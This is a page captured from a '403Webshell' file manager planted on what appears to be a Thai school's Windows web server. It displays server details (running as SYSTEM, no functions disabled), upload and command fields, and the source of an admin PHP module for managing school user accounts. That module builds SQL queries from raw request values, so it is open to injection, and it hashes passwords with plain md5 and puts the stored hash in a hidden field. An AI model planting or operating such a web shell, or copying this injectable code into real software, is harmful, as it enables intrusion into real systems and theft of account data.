403Webshell
Server IP : 104.21.80.248  /  Your IP : 162.159.115.42
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/nongplamor/modules/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/nongplamor/modules/admin/user_cpsch.php
<?
CheckAdmin($_SESSION['admin_user'], $_SESSION['admin_pwd']);
?>
<script language="JavaScript">

//******************************************
function checkregis() {
if(document.myform.USERNAME.value=="") {
alert("กรุณากรอกชื่อผู้ใช้ด้วย") ;
document.myform.USERNAME.select() ;
return false ;
}
if(document.myform.PASSWORD.value=="") {
alert("กรุณากรอกชื่อผู้ใช้ด้วย") ;
document.myform.PASSWORD.select() ;
return false ;
}

if(document.myform.NAME.value=="") {
alert("กรุณากรอกชื่อโรงเรียน") ;
document.myform.NAME.select() ;
return false ;
}



//********************************************
}
</script>
<div align="center">
 <table cellspacing="0" cellpadding="0" width="1000" border="0">
        <tbody>
          <tr>
            <td vAlign=top>
                                      <b><img src="images/icon/plus.gif" border="0" align="absmiddle" /> <a href="?name=admin&amp;file=main">หน้าหลักผู้ดูแลระบบ</a> <br />
                                      <a href="?name=admin&amp;file=user_cpsch"><img src="images/admin/admins.gif"  border="0" align="absmiddle" /> จัดการผู้ใช้</a> &nbsp;&nbsp;&nbsp;<a href="?name=admin&amp;file=user_cpsch&amp;op=usersch_add"><img src="images/admin/user.gif"  border="0" align="absmiddle" /> เพิ่มผู้ใช้</a><br />
                                      <br />
				</td>
				</tr>
				<tr>
				<td  align="center" vAlign=top>
                                      <!-- แสดงผลรายการสมาชิกเวป -->
                                      <?
//////////////////////////////////////////// แสดงรายชื่อสมาชิกเวป
 if($_GET[op] == "usersch_add" AND $_GET[action] == "add"){
	//////////////////////////////////////////// กรณีเพิ่ม User Admin Database
	if(CheckLevel($_SESSION['admin_user'],$_GET[op])){
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	//ตรวจสอบมี user นี้หรือยัง
	$res[usersch] = $db->select_query("SELECT id FROM ".TB_usersch." WHERE username='".$_POST[USERNAME]."' ");
	$rows[usersch] = $db->rows($res[usersch]); 
	$db->closedb ();
		if($rows[usersch]){
			$ProcessOutput .= "<BR><BR>";
			$ProcessOutput .= "<CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\"><BR><BR>";
			$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ชื่อสมาชิกเวป : ".$_POST[USERNAME]." มีในระบบแล้วไม่สามารถเพิ่มได้</B></FONT><BR><BR>";
			$ProcessOutput .= "<A HREF=\"javascript:history.go(-1);\"><B>กลับไปแก้ไข</B></A>";
			$ProcessOutput .= "</CENTER>";
			$ProcessOutput .= "<BR><BR>";
		}else{
			//ทำการเพิ่มข้อมูลลงดาต้าเบส
			$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
			$db->add_db(TB_usersch,array(
				"username"=>"$_POST[USERNAME]",
				"password"=>"".md5($_POST[PASSWORD])."",
				"name"=>"$_POST[NAME]",
				"radab"=>"$_POST[RADAB]",
				"email"=>"$_POST[EMAIL]",
				"level"=>"$_POST[LEVEL]",
				"address"=>"$_POST[ADDRESS]",
				"tabain"=>"$_POST[TABAIN]",
				"status"=>"1",
				"post_date"=>"".TIMESTAMP."",
			    "update_date"=>"".TIMESTAMP.""
			));
			$db->closedb ();
			$ProcessOutput .= "<BR><BR>";
			$ProcessOutput .= "<CENTER><A HREF=\"?name=admin&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
			$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการเพิ่มชื่อสมาชิกเวป : ".$_POST[USERNAME]." เข้าสู่ระบบเรียบร้อยแล้ว</B></FONT><BR><BR>";
			$ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=admin&file=tabainuserschool\">";
			$ProcessOutput .= "</CENTER>";
			$ProcessOutput .= "<BR><BR>";
	}	
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "usersch_add"){
	//////////////////////////////////////////// กรณีเพิ่ม User Admin Form
	if(CheckLevel($_SESSION['admin_user'],$_GET[op])){
?>
                                      <form method="post" action="?name=admin&amp;file=user_cpsch&amp;op=usersch_add&amp;action=add" enctype="multipart/form-data" onSubmit="return checkregis()">
                                        <table width=700 bgcolor=#FFFFC6>
											<tr>
											<td  align="center" vAlign=top  colspan="2">บันทึกรายชื่อโรงเรียน
											</td>
                                          </tr>
                                          <tr>
                                            <td width="150"><div align="right"><b>ชื่อผู้ใช้ :</b></div></td>
                                            <td><input type="text" name="USERNAME" size="40" id="USERNAME" />*ใช้อักษรอังกฤษ-เลขอารบิค</td>
                                          </tr>
											<tr>
                                            <td><div align="right"><b>รหัสผ่าน :</b></div></td>
                                            <td><input type="password" name="PASSWORD" size="40" id="PASSWORD" />*ใช้เลขอารบิค</td>
                                          </tr>
											<tr>
                                            <td><div align="right"><b>ชื่อหน่วยงาน :</b></div></td>
                                            <td><input type="text" name="NAME" size="40" id="NAME" />*ใช้ภาษาไทย</td>
                                          </tr>
											<tr>
                                            <td><div align="right"><b>เลขทะเบียนส่ง :</b></div></td>
                                            <td><input type="text" name="TABAIN" size="40" id="NAME" /></td>
                                          </tr>
											<tr>
                                            <td><div align="right"><b>หน่วย :</b></div></td>
                                            <td>
											<SELECT NAME="ADDRESS"><option></option>
											<?
											$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
											$res[category] = $db->select_query("SELECT * FROM ".TB_AMP_CAT." ORDER BY id ");
											while ($arr[category] = $db->fetch($res[category])){
											echo "<option value=\"".$arr[category][id]."\"";
											echo ">".$arr[category][category_name]."</option>";
											}
											$db->closedb ();
											?>
											</SELECT>	
											</td>
                                          </tr>
											<tr>
                                            <td><div align="right"><b>สังกัด:</b></div></td>
                                            <td>
											<SELECT NAME="RADAB"><option></option>
											<?
											$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
											$res[category] = $db->select_query("SELECT * FROM ".TB_RADAB_CAT." ORDER BY id ");
											while ($arr[category] = $db->fetch($res[category])){
											echo "<option value=\"".$arr[category][id]."\"";
											echo ">".$arr[category][category_name]."</option>";
											}
											$db->closedb ();
											?>
											</SELECT>	
											</td>
                                          </tr>										 
										<tr>
                                            <td><div align="right"><b>อีเมล์ :</b></div></td>
                                            <td><input type="text" name="EMAIL" size="40" id="EMAIL" /></td>
                                          </tr>   
			                                <tr>
                                            <td><div align="right"><b>Level :</b></div></td>
                                            <td><select name="LEVEL" id="LEVEL">
                                                 <?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[groups] = $db->select_query("SELECT * FROM ".TB_ADMIN_GROUP." WHERE  id='3' or id='2' ORDER BY id ");
   while ($arr[groups] = $db->fetch($res[groups]))
   {
		echo "<option value=\"".$arr[groups][id]."\" ";
		if($arr[groups][id] == $arr[usersch][level]){echo " Selected";};
		echo ">".$arr[groups][name]."</option>";
   }
$db->closedb ();
?>
                                            </select></td>
                                          </tr>
                                          <tr>
                                            <td><div align="right"></div></td>
                                            <td><input type="submit" value=" เพิ่มสมาชิก" /></td>
                                          </tr>
                                        </table>
                                    </form>
                                    <?
	}else{
		//กรณีไม่ผ่าน
		echo  $PermissionFalse ;
	}
}else if($_GET[op] == "minepass_edit" AND $_GET[action] == "edit"){
	//////////////////////////////////////////// กรณีแก้ไขข้อมูลส่วนตัว
	if(CheckLevel($_SESSION['admin_user'],$_GET[op])){
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
//		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE id='".$_GET[id]."' ");
		$arr[usersch] = $db->fetch($res[usersch]);
		$db->closedb ();

			if(!$_POST[USERNAME] OR !$_POST[NAME] OR !$_POST[EMAIL]){
				$ProcessOutput .= "<BR><BR>";
				$ProcessOutput .= "<CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\"><BR><BR>";
				$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>กรุณากรอกข้อมูลต่างๆให้ครบถ้วน</B></FONT><BR><BR>";
				$ProcessOutput .= "<A HREF=\"javascript:history.go(-1);\"><B>กลับไปแก้ไข</B></A>";
				$ProcessOutput .= "</CENTER>";
				$ProcessOutput .= "<BR><BR>";
			}else{
				$User_User = $_GET[id];                     //$_SESSION[admin_user];
				if($_POST[PASSWORD]){
					$NewPass = md5($_POST[PASSWORD]);
					$URLre = "?name=admin&file=user_cpsch";
					//session_unset();
					//session_destroy();
				}else{
					$NewPass = $_POST[oldpass];
					$URLre = "?name=admin&file=user_cpsch";
				}
				
	
				//ทำการแก้ไขข้อมูลลงดาต้าเบส
				$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
				$db->update_db(TB_usersch,array(
					"username"=>"$_POST[USERNAME]",
					"password"=>"$NewPass",
					"name"=>"$_POST[NAME]",
					"radab"=>"$_POST[RADAB]",
					"email"=>"$_POST[EMAIL]",
					"level"=>"$_POST[LEVEL]",					
					"address"=>"$_POST[ADDRESS]",
					"tabain"=>"$_POST[TABAIN]",
					"status"=>"$_POST[STATUS]",
			    "update_date"=>"".TIMESTAMP.""
//				)," username='$Admin_User' ");
			)," id='$_GET[id]' ");				
				$db->closedb ();
				$ProcessOutput .= "<BR><BR>";
				$ProcessOutput .= "<CENTER><A HREF=\"".$URLre."\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
				$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการแก้ไขข้อมูลเรียบร้อยแล้ว</B></FONT><BR><BR>";
				$ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=admin&file=tabainuserschool\">";
				$ProcessOutput .= "</CENTER>";
				$ProcessOutput .= "<BR><BR>";
		}
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "minepass_edit"){
	//////////////////////////////////////////// กรณีแก้ไขข้อมูลส่วนตัว
	if(CheckLevel($_SESSION['admin_user'],$_GET[op])){
		//ดึงค่าของสมาชิกเวปออกมา
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
//		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE id='".$_GET[id]."' ");		
		$arr[usersch] = $db->fetch($res[usersch]);
		$db->closedb ();
?>
                                      <form method="post" action="?name=admin&file=user_cpsch&op=minepass_edit&action=edit&id=<? echo $arr[usersch][id];?>" enctype="multipart/form-data">
                                        <table width="700">
                                          <tr>
                                            <td width="150"><div align="right"><b>ชื่อผู้ใช้ :</b></div></td>
                                            <td><input name="USERNAME" type="text" id="USERNAME" style="color=#FF0000;" value="<?=$arr[usersch][username];?>" size="40"  /></td>
                                          </tr>
										  <BR>
                                          <tr>
                                            <td><div align="right"><b>รหัสผ่าน :</b></div></td>
                                            <td><input type="password" name="PASSWORD" size="40" value="" id="PASSWORD" /></td>
                                          </tr>
                                          <tr>
                                            <td><div align="right"><b>ชื่อหน่วยงาน:</b></div></td>
                                            <td><input name="NAME" type="text" id="NAME" value="<?=$arr[usersch][name];?>" size="40" /></td>
                                          </tr>
											<tr>
                                            <td><div align="right"><b>เลขทะเบียนส่ง :</b></div></td>
                                            <td><input type="text" name="TABAIN" size="20" value="<?=$arr[usersch][tabain];?>"/>** เลขหนังสือส่งของหน่วยงาน</td>
                                          </tr>
                                          <tr>
                                            <td><div align="right"><b>หน่วย :</b></div></td>
                                           <td><SELECT NAME="ADDRESS">
<?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[category] = $db->select_query("SELECT * FROM ".TB_AMP_CAT." ORDER BY id ");
while ($arr[category] = $db->fetch($res[category])){
	   echo "<option value=\"".$arr[category][id]."\" ";
		if($arr[category][id] == $arr[usersch][address]){echo " Selected";};
		echo ">".$arr[category][category_name]."</option>";
	   
}
$db->closedb ();
?>


</SELECT>	</td>
                                          </tr>
                                        	<tr>
                                            <td><div align="right"><b>สังกัด:</b></div></td>
                                            <td>
<SELECT NAME="RADAB"><option></option>
 <?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[category] = $db->select_query("SELECT * FROM ".TB_RADAB_CAT." ORDER BY id ");
while ($arr[category] = $db->fetch($res[category]))
		 {
	  echo "<option value=\"".$arr[category][id]."\" ";
		if($arr[category][id] == $arr[usersch][radab]){echo " Selected";};
		echo ">".$arr[category][category_name]."</option>";
   }
$db->closedb ();
?>

</SELECT>	
											</td>
                                          </tr>
										<tr>
                                            <td><div align="right"><b>อีเมล์ :</b></div></td>
                                            <td><input name="EMAIL" type="text" id="EMAIL" value="<?=$arr[usersch][email];?>" size="40" /></td>
                                          </tr>
                                       
                                          <tr>
                                            <td><div align="right"><b>Level :</b></div></td>
                                            <td><select name="LEVEL" id="LEVEL"><option></option>
                                                <?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[groups] = $db->select_query("SELECT * FROM ".TB_ADMIN_GROUP." WHERE  id='3' or id='2' ORDER BY id ");
   while ($arr[groups] = $db->fetch($res[groups]))
   {
		echo "<option value=\"".$arr[groups][id]."\" ";
		if($arr[groups][id] == $arr[usersch][level]){echo " Selected";};
		echo ">".$arr[groups][name]."</option>";
   }
$db->closedb ();
?>
                                                                                        </select></td>
                                          </tr>
                                          <tr>
                                            <td><div align="right"><input name="STATUS" type="hidden" id="STATUS" value="1" size="40" /></div></td>
                                            <td><input type="submit" value=" แก้ไขข้อมูลส่วนตัว " />
                                                <input type="hidden" name="oldpass" value="<?=$arr[usersch][password];?>" /></td>
                                          </tr>
                                        </table>
                                    </form>
                                    <?
	}else{
		//กรณีไม่ผ่าน
		echo $PermissionFalse ;
	}
}
?>
                                  </td>
                                </tr>
                              </table>
                            <br /></td>
                          </tr>
                      </table>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit